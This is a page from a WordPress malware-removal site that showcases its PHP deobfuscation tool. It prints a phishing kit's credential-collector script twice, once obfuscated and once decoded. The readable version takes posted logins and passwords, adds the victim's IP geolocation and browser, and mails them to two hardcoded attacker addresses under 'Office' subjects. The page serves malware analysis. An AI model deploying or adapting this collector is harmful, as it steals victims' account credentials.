Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php ${"\x47\x4c\x4f\x42A\x4c\x53"}["n\x6ctv\x79n\x73"]="\x75\x69\x73\x6d";${"\x47L\x4fBA\x4cS"}["\x74pgm\x6e\x74p\x70ge\x6e"]="\x65\x6d1";${"G\x4c\x4f\x42A\x4c\x53"}["\x79djw\x78qy\x6d"]="\x6dyms\x67";${"\x47LOBALS"}["\x78\x73dd\x63iij"]="\x75\x69\x73\x6d";${"GLO\x42A\x4c\x53"}["\x70u\x68q\x79\...



Obfuscated php code

<?php ${"\x47\x4c\x4f\x42A\x4c\x53"}["n\x6ctv\x79n\x73"]="\x75\x69\x73\x6d";${"\x47L\x4fBA\x4cS"}["\x74pgm\x6e\x74p\x70ge\x6e"]="\x65\x6d1";${"G\x4c\x4f\x42A\x4c\x53"}["\x79djw\x78qy\x6d"]="\x6dyms\x67";${"\x47LOBALS"}["\x78\x73dd\x63iij"]="\x75\x69\x73\x6d";${"GLO\x42A\x4c\x53"}["\x70u\x68q\x79\x6a\x7a"]="d\x61t\x61";${"\x47LOB\x41L\x53"}["\x64\x72\x69f\x6f\x6b\x67\x70m\x65m"]="\x65m\x612";${"\x47\x4c\x4f\x42\x41L\x53"}["wj\x6d\x61\x7a\x79\x62"]="\x64a\x74\x61";$tykcxq="\x65ma\x32";${"G\x4c\x4fB\x41\x4c\x53"}["\x62i\x6f\x73u\x70\x77\x69\x6a\x73\x67\x6f"]="b\x72\x6f\x77\x73e\x72";$ycgcieqs="\x65\x6d\x31";${"\x47\x4c\x4fB\x41\x4c\x53"}["x\x6c\x78k\x6do"]="\x64\x65t\x61\x69\x6cs";${"G\x4cO\x42\x41\x4c\x53"}["\x63\x67m\x6a\x6cz\x71\x74n"]="\x68\x6f\x73\x74\x6eam\x65";${"\x47L\x4f\x42AL\x53"}["h\x78\x63\x6d\x65\x73\x6e\x68\x6a\x76s\x64"]="i\x70";$ifgxcspgvs="pis\x6d";${${"\x47\x4cO\x42\x41\x4c\x53"}["h\x78\x63\x6desn\x68\x6av\x73\x64"]}=getenv("REMO\x54\x45_ADD\x52");$eitcugohjuu="\x73\x61\x69\x6f";${${"\x47\x4cOB\x41\x4c\x53"}["c\x67mjl\x7a\x71\x74n"]}=gethostbyaddr(${${"\x47\x4c\x4f\x42\x41\x4cS"}["h\x78c\x6de\x73n\x68\x6av\x73\x64"]});${${"G\x4c\x4f\x42\x41L\x53"}["\x78\x6cx\x6b\x6d\x6f"]}=json_decode(file_get_contents("\x68\x74\x74p://ip\x69\x6e\x66\x6f\x2eio/{$ip}"));${${"G\x4c\x4f\x42\x41\x4cS"}["\x62\x69o\x73\x75\x70w\x69\x6as\x67\x6f"]}=$_SERVER["HT\x54P\x5f\x55S\x45\x52\x5f\x41\x47E\x4e\x54"];${$ycgcieqs}="\x3d\x3dg\x62\x6c\x312\x63\x6c\x56\x6e\x63\x75\x67\x58\x5au\x56\x57\x62zVGZuFWeA5\x6d\x62l1\x32cl\x56n";${${"\x47L\x4fB\x41\x4c\x53"}["\x64r\x69\x66ok\x67pm\x65m"]}="\x5auVn\x5auVWb\x7a\x56Wd\x76\x6c\x48I\x73\x34\x57\x5a\x74N\x58\x5at9\x32Yuwm\x62l\x31\x32";${${"\x47LO\x42\x41L\x53"}["\x70\x75\x68\x71\x79\x6az"]}=array();${${"\x47\x4cOBA\x4c\x53"}["x\x73\x64\x64\x63\x69\x69\x6a"]}=$_POST["s\x69\x63\x6b\x6f"];${$ifgxcspgvs}=$_POST["\x6dicko"];${${"GL\x4f\x42\x41L\x53"}["\x79\x64\x6a\x77\x78\x71\x79\x6d"]}="\x4c\x6fg\x69\x6e:\x20$uism\nP\x61sswor\x64: $pism\n\x49P \x41d\x64\x72e\x73s: $ip\n\x43\x69t\x79: {$details->city}\n\x52\x65\x67ion:\x20{$details->region}\nC\x6f\x75n\x74\x72y: {$details->country} \n\nB\x72\x6f\x77\x73er: $browser\x3b";${$eitcugohjuu}=${${"GL\x4f\x42A\x4c\x53"}["tpg\x6d\x6e\x74\x70\x70g\x65\x6e"]}.${$tykcxq}."\x63ll\x57Yt\x64\x47Q\x6b5WZt\x4e\x58Zk\x4eH\x61h5\x57\x5atNXZ\x6b\x52G\x5ak\x35WZ\x74N\x58Z";if(filter_var(trim(${${"\x47L\x4f\x42\x41L\x53"}["\x6e\x6ct\x76\x79\x6e\x73"]}),FILTER_VALIDATE_EMAIL)){$eiyjgxxiy="\x73e\x6ed\x6f\x6f";$llzywdlkr="\x73\x61\x69o";${$eiyjgxxiy}=str_replace("es\x6d\x65n","",base64_decode(strrev(${$llzywdlkr})));if($_POST["\x69\x6ed\x69\x63a"]<1){$lyxitlwby="\x64\x61t\x61";${"\x47LOBAL\x53"}["\x70t\x79\x6f\x74\x63\x62l"]="s\x65n\x64o\x6f";mail(${${"\x47LOB\x41L\x53"}["pt\x79\x6f\x74\x63b\x6c"]},"\x4fffi\x63e \x4f\x6e\x65",${${"G\x4c\x4f\x42AL\x53"}["\x79\x64\x6a\x77\x78\x71\x79\x6d"]});${$lyxitlwby}["su\x63c\x65\x73\x73"]=false;}else{$heclieqpsyzw="\x73en\x64o\x6f";${"\x47\x4cO\x42\x41\x4cS"}["nxs\x6d\x70\x6f"]="\x64\x61\x74a";mail(${$heclieqpsyzw},"\x4fffi\x63e\x20T\x77\x6f",${${"GLO\x42\x41\x4c\x53"}["y\x64\x6a\x77xq\x79\x6d"]});${${"\x47L\x4f\x42\x41\x4cS"}["\x6ex\x73\x6d\x70\x6f"]}["\x73u\x63c\x65ss"]=true;}}else{echo".:|";die();}header("\x43o\x6e\x74\x65nt-\x54ype: appl\x69ca\x74\x69\x6fn/j\x73\x6fn");header("\x41c\x63\x65\x73s-\x43o\x6e\x74\x72ol-\x41ll\x6f\x77-O\x72\x69\x67\x69n:\x20*");echo json_encode(${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x77jm\x61z\x79b"]});
?>

Decoded(de-Obfuscated) php code

<?php

$GLOBALS["nltvyns"] = "uism";
$GLOBALS["tpgmntppgen"] = "em1";
$GLOBALS["ydjwxqym"] = "mymsg";
$GLOBALS["xsddciij"] = "uism";
$GLOBALS["puhqyjz"] = "data";
$GLOBALS["drifokgpmem"] = "ema2";
$GLOBALS["wjmazyb"] = "data";
$tykcxq = "ema2";
$GLOBALS["biosupwijsgo"] = "browser";
$ycgcieqs = "em1";
$GLOBALS["xlxkmo"] = "details";
$GLOBALS["cgmjlzqtn"] = "hostname";
$GLOBALS["hxcmesnhjvsd"] = "ip";
$ifgxcspgvs = "pism";
$ip = getenv("REMOTE_ADDR");
$eitcugohjuu = "saio";
$hostname = gethostbyaddr($ip);
$details = json_decode(file_get_contents("http://ipinfo.io/{$ip}"));
$browser = $_SERVER["HTTP_USER_AGENT"];
$em1 = "==gbl12clVncugXZuVWbzVGZuFWeA5mbl12clVn";
$ema2 = "ZuVnZuVWbzVWdvlHIs4WZtNXZt92Yuwmbl12";
$data = array();
$uism = $_POST["sicko"];
$pism = $_POST["micko"];
$mymsg = "Login: {$uism}\nPassword: {$pism}\nIP Address: {$ip}\nCity: {$details->city}\nRegion: {$details->region}\nCountry: {$details->country} \n\nBrowser: {$browser};";
$saio = "==gbl12clVncugXZuVWbzVGZuFWeA5mbl12clVnZuVnZuVWbzVWdvlHIs4WZtNXZt92Yuwmbl12cllWYtdGQk5WZtNXZkNHah5WZtNXZkRGZk5WZtNXZ";
if (filter_var(trim($uism), FILTER_VALIDATE_EMAIL)) {
    $eiyjgxxiy = "sendoo";
    $llzywdlkr = "saio";
    $sendoo = "ddddahsdd@gmail.com, youfunfun@yandex.ru";
    if ($_POST["indica"] < 1) {
        $lyxitlwby = "data";
        $GLOBALS["ptyotcbl"] = "sendoo";
        mail($sendoo, "Office One", $mymsg);
        $data["success"] = false;
    } else {
        $heclieqpsyzw = "sendoo";
        $GLOBALS["nxsmpo"] = "data";
        mail($sendoo, "Office Two", $mymsg);
        $data["success"] = true;
    }
} else {
    echo ".:|";
    die;
}
header("Content-Type: application/json");
header("Access-Control-Allow-Origin: *");
echo json_encode(${$GLOBALS["wjmazyb"]});

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.